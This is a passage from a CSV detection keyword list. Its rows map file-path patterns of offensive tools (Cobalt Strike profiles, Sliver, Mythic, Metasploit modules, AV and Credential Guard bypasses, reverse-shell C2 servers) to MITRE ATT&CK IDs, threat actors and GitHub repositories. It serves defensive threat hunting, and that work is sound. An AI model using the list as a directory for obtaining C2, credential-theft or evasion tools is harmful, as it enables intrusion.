security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/BurpSuite-collections*",".{0,1000}\/BurpSuite\-collections.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/BUYTHEAPTDETECTORNOW*",".{0,1000}\/BUYTHEAPTDETECTORNOW.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/byakugan.cpp*",".{0,1000}\/byakugan\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/byakugan.dll*",".{0,1000}\/byakugan\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/bypass.vbs*",".{0,1000}\/bypass\.vbs.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Bypass/payloads*",".{0,1000}\/Bypass\/payloads.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/bypass_mod/loader*",".{0,1000}\/bypass_mod\/loader.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*/BypassAV/*",".{0,1000}\/BypassAV\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","871","124","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" "*/bypassAV-1/*",".{0,1000}\/bypassAV\-1\/.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "*/bypass-clm.exe*",".{0,1000}\/bypass\-clm\.exe.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*/bypass-clm.git*",".{0,1000}\/bypass\-clm\.git.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*/BypassCredGuard.cpp*",".{0,1000}\/BypassCredGuard\.cpp.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*/BypassCredGuard.exe*",".{0,1000}\/BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - 
T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*/BypassCredGuard.git*",".{0,1000}\/BypassCredGuard\.git.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*/BypassFramework.py*",".{0,1000}\/BypassFramework\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/bypassuac/*",".{0,1000}\/bypassuac\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/C2/Beacon/*.cs*",".{0,1000}\/C2\/Beacon\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/c2/c2.go*",".{0,1000}\/c2\/c2\.go.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/C2/c2.go*",".{0,1000}\/C2\/c2\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*/C2/Http/*.cs*",".{0,1000}\/C2\/Http\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small 
RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/C2/server.py*",".{0,1000}\/C2\/server\.py.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*/C2/SmbListener.*",".{0,1000}\/C2\/SmbListener\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/c2/tcp-stager.*",".{0,1000}\/c2\/tcp\-stager\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/c2_code/*.html",".{0,1000}\/c2_code\/.{0,1000}\.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/c2_code/server*",".{0,1000}\/c2_code\/server.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/C2_Profiles/*",".{0,1000}\/C2_Profiles\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/C2_Server.git*",".{0,1000}\/C2_Server\.git.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*/c2_server.py*",".{0,1000}\/c2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*/c2_server/resources*",".{0,1000}\/c2_server\/resources.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and 
post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/c2_test.go*",".{0,1000}\/c2_test\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/C2concealer*",".{0,1000}\/C2concealer.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*/C2concealer*",".{0,1000}\/C2concealer.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/c2endpoint.php*",".{0,1000}\/c2endpoint\.php.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/C2Frame.*",".{0,1000}\/C2Frame\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/C2Manager.cs*",".{0,1000}\/C2Manager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/c2profile.*",".{0,1000}\/c2profile\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/c2profile.go*",".{0,1000}\/c2profile\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*/C2Profiles/*",".{0,1000}\/C2Profiles\/.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/C2ReverseProxy.git*",".{0,1000}\/C2ReverseProxy\.git.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2ReverseProxy/*",".{0,1000}\/C2ReverseProxy\/.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2ReverseProxy/tarball*",".{0,1000}\/C2ReverseProxy\/tarball.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2ReverseProxy/zipball*",".{0,1000}\/C2ReverseProxy\/zipball.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - 
T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2ReverseServer*",".{0,1000}\/C2ReverseServer.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2script/*",".{0,1000}\/C2script\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*/C2Server.py*",".{0,1000}\/C2Server\.py.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and 
